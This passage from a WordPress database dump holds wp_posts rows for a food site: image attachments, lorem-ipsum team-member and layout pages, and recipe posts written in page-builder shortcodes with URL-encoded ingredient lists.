12:39:55','','portfolio-img-8','','inherit','open','closed','','portfolio-img-8','','','2018-02-01 12:39:55','2018-02-01 12:39:55','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/portfolio-img-8.jpg',0,'attachment','image/jpeg',0),(1811,1,'2018-02-01 12:39:57','2018-02-01 12:39:57','','portfolio-img-9','','inherit','open','closed','','portfolio-img-9','','','2018-02-01 12:39:57','2018-02-01 12:39:57','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/portfolio-img-9.jpg',0,'attachment','image/jpeg',0),(1812,1,'2018-02-01 12:39:59','2018-02-01 12:39:59','','portfolio-img-10','','inherit','open','closed','','portfolio-img-10','','','2018-02-01 12:39:59','2018-02-01 12:39:59','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/portfolio-img-10.jpg',0,'attachment','image/jpeg',0),(1813,1,'2018-02-01 12:40:01','2018-02-01 12:40:01','','portfolio-img-11','','inherit','open','closed','','portfolio-img-11','','','2018-02-01 12:40:01','2018-02-01 12:40:01','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/portfolio-img-11.jpg',0,'attachment','image/jpeg',0),(1814,1,'2018-02-01 12:40:03','2018-02-01 12:40:03','','portfolio-img-12','','inherit','open','closed','','portfolio-img-12','','','2018-02-01 12:40:03','2018-02-01 12:40:03','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/portfolio-img-12.jpg',0,'attachment','image/jpeg',0),(1815,1,'2018-02-01 12:40:06','2018-02-01 12:40:06','','portfolio-img-13','','inherit','open','closed','','portfolio-img-13','','','2018-02-01 12:40:06','2018-02-01 12:40:06','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/portfolio-img-13.jpg',0,'attachment','image/jpeg',0),(1816,1,'2018-02-01 12:40:08','2018-02-01 12:40:08','','portfolio-img-14','','inherit','open','closed','','portfolio-img-14','','','2018-02-01 12:40:08','2018-02-01 12:40:08','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/portfolio-img-14.jpg',0,'attachment','image/jpeg',0),(1817,1,'2018-02-01 12:40:10','2018-02-01 12:40:10','','portfolio-img-15','','inherit','open','closed','','portfolio-img-15','','','2018-02-01 12:40:10','2018-02-01 12:40:10','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/portfolio-img-15.jpg',0,'attachment','image/jpeg',0),(1818,1,'2018-02-01 12:40:12','2018-02-01 12:40:12','','portfolio-img-16','','inherit','open','closed','','portfolio-img-16','','','2018-02-01 12:40:12','2018-02-01 12:40:12','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/portfolio-img-16.jpg',0,'attachment','image/jpeg',0),(1827,1,'2018-02-01 15:11:59','2018-02-01 15:11:59','','what-we-do-img-1','','inherit','open','closed','','what-we-do-img-1','','','2018-02-01 15:11:59','2018-02-01 15:11:59','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/what-we-do-img-1.jpg',0,'attachment','image/jpeg',0),(1919,1,'2018-02-02 11:47:21','2018-02-02 11:47:21','','bottle-1','','inherit','open','closed','','bottle-1','','','2018-02-02 11:47:21','2018-02-02 11:47:21','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/bottle-1.png',0,'attachment','image/png',0),(2002,1,'2018-02-02 13:50:41','2018-02-02 13:50:41','','flower','','inherit','open','closed','','flower','','','2018-02-02 13:50:41','2018-02-02 13:50:41','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/flower.png',0,'attachment','image/png',0),(2005,1,'2020-04-12 11:58:12','2020-04-12 11:58:12','','Logo-500-x-','','inherit','open','closed','','logo-500-x','','','2020-04-12 11:58:17','2020-04-12 11:58:17','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-500-x-.png',0,'attachment','image/png',0),(2027,1,'2018-02-02 15:49:51','2018-02-02 15:49:51','','h7-img-22','','inherit','open','closed','','h7-img-22','','','2018-02-02 15:49:51','2018-02-02 15:49:51','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h7-img-22.png',0,'attachment','image/png',0),(2037,1,'2018-02-05 09:40:45','2018-02-05 09:40:45','[vc_row row_content_width=\"grid\" parallax_background_image=\"2975\"][vc_column][qodef_elements_holder holder_full_height=\"yes\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"140px 48% 158px 24px\" item_padding_768_1024=\"110px 28% 149px 0px\" item_padding_680_768=\"100px 12% 149px 0px\" item_padding_680=\"100px 0 144px 0px\"][qodef_custom_font title_tag=\"\" font_weight=\"700\" subtitle_font_weight=\"300\" font_style=\"\" text_transform=\"\" text_decoration=\"\" text_align=\"\" title=\"Our Team\" font_family=\"Quicksand (OTT)\" font_size=\"72px\" line_height=\"72px\" subtitle=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ali quam a tincidunt nisi, pellentesque eleifend.\" subtitle_font_size=\"20px\" subtitle_line_height=\"27px\" letter_spacing=\"2px\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][/vc_row][vc_row content_text_aligment=\"center\" css=\".vc_custom_1519212238625{padding-top: 117px !important;padding-bottom: 51px !important;}\"][vc_column][qodef_section_title type=\"standard\" position=\"\" subtitle_tag=\"\" title_tag=\"h1\" disable_break_words=\"no\" subtitle=\"SWEET & HEALTHY FOOD\" title=\"Real Professionals\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1517831261781{padding-bottom: 94px !important;}\"][vc_column][qodef_team_list number_of_columns=\"4\" space_between_items=\"normal\" number_of_items=\"4\" orderby=\"date\" order=\"ASC\"][/vc_column][/vc_row][vc_row content_text_aligment=\"center\" css=\".vc_custom_1517831294087{padding-bottom: 42px !important;}\"][vc_column][qodef_single_image enable_image_shadow=\"no\" image=\"2061\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1519212260085{padding-bottom: 120px !important;}\"][vc_column][contact-form-7 id=\"2495\" html_class=\"cf7_custom_style_2\"][/vc_column][/vc_row]','Our Team','','publish','closed','closed','','our-team','','','2018-02-05 09:40:45','2018-02-05 09:40:45','',0,'http://succulents.select-themes.com/?page_id=2037',0,'page','',0),(2054,1,'2018-02-05 11:07:10','2018-02-05 11:07:10','[vc_row css=\".vc_custom_1517828680323{padding-bottom: 21px !important;}\"][vc_column][vc_column_text]It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout and web page. Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.[/vc_column_text][vc_column_text]\n
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut suscipit ultrices diam non dictum. Aliquam tempus quis erat nec malesuada. Cras placerat leo vitae nisl auctor, nec volutpat libero lacinia. Nulla vel malesuada nibh. Donec et est erat.
\n[/vc_column_text][/vc_column][/vc_row]','Nate Foller','At his justo aperiri, id liber suavi tate tincidunt vel urum diam nec. ','publish','open','closed','','nate-foller','','','2018-02-05 11:07:10','2018-02-05 11:07:10','',0,'http://succulents.select-themes.com/?post_type=team-member&p=2054',0,'team-member','',0),(2055,1,'2018-02-05 11:06:24','2018-02-05 11:06:24','','team-member-4','','inherit','open','closed','','team-member-4','','','2018-02-05 11:06:24','2018-02-05 11:06:24','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/team-member-4.jpg',0,'attachment','image/jpeg',0),(2056,1,'2018-02-05 11:08:32','2018-02-05 11:08:32','[vc_row css=\".vc_custom_1517828680323{padding-bottom: 21px !important;}\"][vc_column][vc_column_text]It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout and web page. Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.[/vc_column_text][vc_column_text]\n
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut suscipit ultrices diam non dictum. Aliquam tempus quis erat nec malesuada. Cras placerat leo vitae nisl auctor, nec volutpat libero lacinia. Nulla vel malesuada nibh. Donec et est erat.
\n[/vc_column_text][/vc_column][/vc_row]','Susan Mink','At his justo aperiri, id liber suavi tate tincidunt vel urum diam nec. ','publish','open','closed','','susan-mink','','','2018-02-05 11:08:32','2018-02-05 11:08:32','',0,'http://succulents.select-themes.com/?post_type=team-member&p=2056',0,'team-member','',0),(2058,1,'2018-02-05 11:10:02','2018-02-05 11:10:02','[vc_row css=\".vc_custom_1517828680323{padding-bottom: 21px !important;}\"][vc_column][vc_column_text]It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout and web page. Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.[/vc_column_text][vc_column_text]\n
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut suscipit ultrices diam non dictum. Aliquam tempus quis erat nec malesuada. Cras placerat leo vitae nisl auctor, nec volutpat libero lacinia. Nulla vel malesuada nibh. Donec et est erat.
\n[/vc_column_text][/vc_column][/vc_row]','Faith Rolls','At his justo aperiri, id liber suavi tate tincidunt vel urum diam nec. ','publish','open','closed','','faith-rolls','','','2018-02-05 11:10:02','2018-02-05 11:10:02','',0,'http://succulents.select-themes.com/?post_type=team-member&p=2058',0,'team-member','',0),(2061,1,'2018-02-05 11:46:04','2018-02-05 11:46:04','','team-img-1','','inherit','open','closed','','team-img-1-2','','','2018-02-05 11:46:04','2018-02-05 11:46:04','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/team-img-1.jpg',0,'attachment','image/jpeg',0),(2070,1,'2018-01-18 13:18:01','2018-01-18 13:18:01','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\r\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\r\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][vc_row_inner][vc_column_inner][qodef_image_gallery type=\"grid\" enable_image_shadow=\"no\" number_of_columns=\"two\" space_between_items=\"small\" images=\"3936,3937\" image_size=\"full\"][/vc_column_inner][/vc_row_inner][vc_empty_space height=\"20px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][qodef_recipe ingredients_1=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch**%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%221%20tsp%20baking%20soda%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%223-4%20tbs%20of%20water%22%7D%5D\" ingredients_2=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch*%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%221%20tbs%20of%20water%22%7D%5D\" ingredients_3=\"%5B%5D\" recipe_name=\"Figs Smoothie\" image=\"724\" prep_time=\"40 Minutes\" cook_time=\"25 Minutes\" name_1=\"Crust\" instructions=\"%5B%7B%22instruction%22%3A%22In%20a%20large%20mixing%20bowl%2C%20combine%20the%20almond%20flour%2C%20arrowroot%2C%20baking%20powder%2C%20salt%2C%20and%20maple%20syrup.%20Mix%20adding%20the%20water%20slowly%20to%20form%20a%20sticky%20ball%20of%20dough.%22%7D%2C%7B%22instruction%22%3A%22On%20a%20piece%20of%20parchment%20paper%2C%20press%2Froll%20into%20a%20circle%20the%20same%20size%20as%20your%20pan.%20Set%20aside.%22%7D%2C%7B%22instruction%22%3A%22Peel%2C%20core%2C%20and%20quarter%20the%20apples.%22%7D%2C%7B%22instruction%22%3A%22In%20a%20tart%20tatin%20dish%20(or%20a%20saucepan)%20combine%20the%20coconut%20milk%2C%20maple%20syrup%2C%20apple%20juice%2C%20and%20vanilla.%20Bring%20to%20a%20simmer%20over%20medium%20heat.%22%7D%2C%7B%22instruction%22%3A%22Add%20the%20apples.%20%22%7D%2C%7B%22instruction%22%3A%22Cook%20stirring%20occasionally%20over%20medium%20heat%20until%20the%20caramel%20is%20thick%20and%20the%20apples%20are%20soft.%20About%2020-25%20minutes.%20%22%7D%5D\" notes=\"*For an oat flour option, use this crust recipe instead.\r\n\r\n**You can use tapioca or cornstarch instead.\r\n\r\n***You can use water instead, but it will be less sweet and flavorful.\" name_2=\"Caramelized apples\"][/vc_column][/vc_row]','Fruit Bowl','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','publish','open','open','','fruit-bowl','','','2020-04-09 09:52:10','2020-04-09 09:52:10','',0,'http://succulents.select-themes.com/?p=2070',0,'post','',0),(2098,1,'2018-02-05 15:08:35','2018-02-05 15:08:35','[vc_row row_content_width=\"grid\" css=\".vc_custom_1521026493438{padding-top: 70px !important;padding-bottom: 70px !important;}\"][vc_column offset=\"vc_col-lg-offset-0 vc_col-lg-4 vc_col-md-offset-0 vc_col-md-4 vc_col-sm-offset-0\"][vc_column_text]Lorem ipsum dolor sit amet, rutrum aliquet taciti vel, nunc sed nec neque eleifend sed tellus, sociis consectetuer dolir ut quit.[/vc_column_text][vc_empty_space height=\"20px\"][qodef_button text=\"Read More\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"#\"][vc_empty_space height=\"20px\"][/vc_column][vc_column offset=\"vc_col-lg-offset-0 vc_col-lg-4 vc_col-md-offset-0 vc_col-md-4 vc_col-sm-offset-0\"][vc_column_text]Lorem ipsum dolor sit amet, rutrum aliquet taciti vel, nunc sed nec neque eleifend sed tellus, sociis consectetuer dolir ut quit.[/vc_column_text][vc_empty_space height=\"20px\"][qodef_button text=\"Read More\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"#\"][vc_empty_space height=\"20px\"][/vc_column][vc_column offset=\"vc_col-lg-offset-0 vc_col-lg-4 vc_col-md-offset-0 vc_col-md-4 vc_col-sm-offset-0\"][vc_column_text]Lorem ipsum dolor sit amet, rutrum aliquet taciti vel, nunc sed nec neque eleifend sed tellus, sociis consectetuer dolir ut quit.[/vc_column_text][vc_empty_space height=\"20px\"][qodef_button text=\"Read More\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"#\"][vc_empty_space height=\"20px\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" simple_background_color=\"#f6f6f6\" css=\".vc_custom_1521026509874{padding-top: 79px !important;padding-bottom: 79px !important;}\"][vc_column offset=\"vc_col-lg-offset-0 vc_col-lg-4 vc_col-md-offset-0 vc_col-md-4 vc_col-sm-offset-0\"][vc_column_text]Lorem ipsum dolor sit amet, rutrum aliquet taciti vel, nunc sed nec neque eleifend sed tellus, sociis consectetuer dolir ut quit.[/vc_column_text][vc_empty_space height=\"20px\"][qodef_button text=\"Read More\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"#\" background_color=\"#3c3c3c\" hover_background_color=\"#ffbea5\" border_color=\"#3c3c3c\" hover_border_color=\"#ffbea5\"][vc_empty_space height=\"20px\"][/vc_column][vc_column offset=\"vc_col-lg-offset-0 vc_col-lg-4 vc_col-md-offset-0 vc_col-md-4 vc_col-sm-offset-0\"][vc_column_text]Lorem ipsum dolor sit amet, rutrum aliquet taciti vel, nunc sed nec neque eleifend sed tellus, sociis consectetuer dolir ut quit.[/vc_column_text][vc_empty_space height=\"20px\"][qodef_button text=\"Read More\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"#\" background_color=\"#3c3c3c\" hover_background_color=\"#ffbea5\" border_color=\"#3c3c3c\" hover_border_color=\"#ffbea5\"][vc_empty_space height=\"20px\"][/vc_column][vc_column offset=\"vc_col-lg-offset-0 vc_col-lg-4 vc_col-md-offset-0 vc_col-md-4 vc_col-sm-offset-0\"][vc_column_text]Lorem ipsum dolor sit amet, rutrum aliquet taciti vel, nunc sed nec neque eleifend sed tellus, sociis consectetuer dolir ut quit.[/vc_column_text][vc_empty_space height=\"20px\"][qodef_button text=\"Read More\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"#\" background_color=\"#3c3c3c\" hover_background_color=\"#ffbea5\" border_color=\"#3c3c3c\" hover_border_color=\"#ffbea5\"][vc_empty_space height=\"20px\"][/vc_column][/vc_row]','Buttons','','publish','closed','closed','','buttons','','','2018-02-05 15:08:35','2018-02-05 15:08:35','',1336,'http://succulents.select-themes.com/?page_id=2098',0,'page','',0),(2105,1,'2018-02-05 15:32:11','2018-02-05 15:32:11','[vc_row row_content_width=\"grid\" css=\".vc_custom_1517908093496{padding-top: 85px !important;padding-bottom: 85px !important;}\"][vc_column][qodef_call_to_action layout=\"normal\" button_text=\"Read More\" button_type=\"solid\" button_size=\"\"]\n

Make your website come to life quickly.

\n[/qodef_call_to_action][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1517908137300{padding-top: 85px !important;padding-bottom: 85px !important;}\" simple_background_color=\"#f6f6f6\"][vc_column][qodef_call_to_action layout=\"normal\" button_text=\"Read More\" button_type=\"solid\" button_size=\"\"]\n

Make your website come to life quickly.

\n[/qodef_call_to_action][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1517908093496{padding-top: 85px !important;padding-bottom: 85px !important;}\"][vc_column][qodef_call_to_action layout=\"normal\" button_text=\"Read More\" button_type=\"solid\" button_size=\"\"]\n

Make your website come to life quickly.

\n[/qodef_call_to_action][/vc_column][/vc_row]','Call to Action','','publish','closed','closed','','call-to-action','','','2018-02-05 15:32:11','2018-02-05 15:32:11','',1336,'http://succulents.select-themes.com/?page_id=2105',0,'page','',0),(2115,1,'2018-02-06 09:21:54','2018-02-06 09:21:54','','blog-img-17','','inherit','open','closed','','blog-img-17-2','','','2018-02-06 09:21:54','2018-02-06 09:21:54','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/blog-img-17.jpg',0,'attachment','image/jpeg',0),(2120,1,'2018-01-17 10:27:15','2018-01-17 10:27:15','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\r\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\r\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][vc_row_inner][vc_column_inner][qodef_image_gallery type=\"grid\" enable_image_shadow=\"no\" number_of_columns=\"two\" space_between_items=\"small\" images=\"3936,3937\" image_size=\"full\"][/vc_column_inner][/vc_row_inner][vc_empty_space height=\"20px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][qodef_recipe ingredients_1=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch**%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%221%20tsp%20baking%20soda%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%223-4%20tbs%20of%20water%22%7D%5D\" ingredients_2=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch*%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%221%20tbs%20of%20water%22%7D%5D\" ingredients_3=\"%5B%5D\" recipe_name=\"Figs Smoothie\" image=\"724\" prep_time=\"40 Minutes\" cook_time=\"25 Minutes\" name_1=\"Crust\" instructions=\"%5B%7B%22instruction%22%3A%22In%20a%20large%20mixing%20bowl%2C%20combine%20the%20almond%20flour%2C%20arrowroot%2C%20baking%20powder%2C%20salt%2C%20and%20maple%20syrup.%20Mix%20adding%20the%20water%20slowly%20to%20form%20a%20sticky%20ball%20of%20dough.%22%7D%2C%7B%22instruction%22%3A%22On%20a%20piece%20of%20parchment%20paper%2C%20press%2Froll%20into%20a%20circle%20the%20same%20size%20as%20your%20pan.%20Set%20aside.%22%7D%2C%7B%22instruction%22%3A%22Peel%2C%20core%2C%20and%20quarter%20the%20apples.%22%7D%2C%7B%22instruction%22%3A%22In%20a%20tart%20tatin%20dish%20(or%20a%20saucepan)%20combine%20the%20coconut%20milk%2C%20maple%20syrup%2C%20apple%20juice%2C%20and%20vanilla.%20Bring%20to%20a%20simmer%20over%20medium%20heat.%22%7D%2C%7B%22instruction%22%3A%22Add%20the%20apples.%20%22%7D%2C%7B%22instruction%22%3A%22Cook%20stirring%20occasionally%20over%20medium%20heat%20until%20the%20caramel%20is%20thick%20and%20the%20apples%20are%20soft.%20About%2020-25%20minutes.%20%22%7D%5D\" notes=\"*For an oat flour option, use this crust recipe instead.\r\n\r\n**You can use tapioca or cornstarch instead.\r\n\r\n***You can use water instead, but it will be less sweet and flavorful.\" name_2=\"Caramelized apples\"][/vc_column][/vc_row]','Coconut Balls','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','publish','open','open','','coconut-balls','','','2020-04-09 10:14:58','2020-04-09 10:14:58','',0,'http://succulents.select-themes.com/?p=2120',0,'post','',0),(2126,1,'2018-01-16 10:36:34','2018-01-16 10:36:34','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\r\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\r\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][vc_row_inner][vc_column_inner][qodef_image_gallery type=\"grid\" enable_image_shadow=\"no\" number_of_columns=\"two\" space_between_items=\"small\" images=\"3936,3937\" image_size=\"full\"][/vc_column_inner][/vc_row_inner][vc_empty_space height=\"20px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][qodef_recipe ingredients_1=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch**%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%221%20tsp%20baking%20soda%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%223-4%20tbs%20of%20water%22%7D%5D\" ingredients_2=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch*%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%221%20tbs%20of%20water%22%7D%5D\" ingredients_3=\"%5B%5D\" recipe_name=\"Figs Smoothie\" image=\"724\" prep_time=\"40 Minutes\" cook_time=\"25 Minutes\" name_1=\"Crust\" 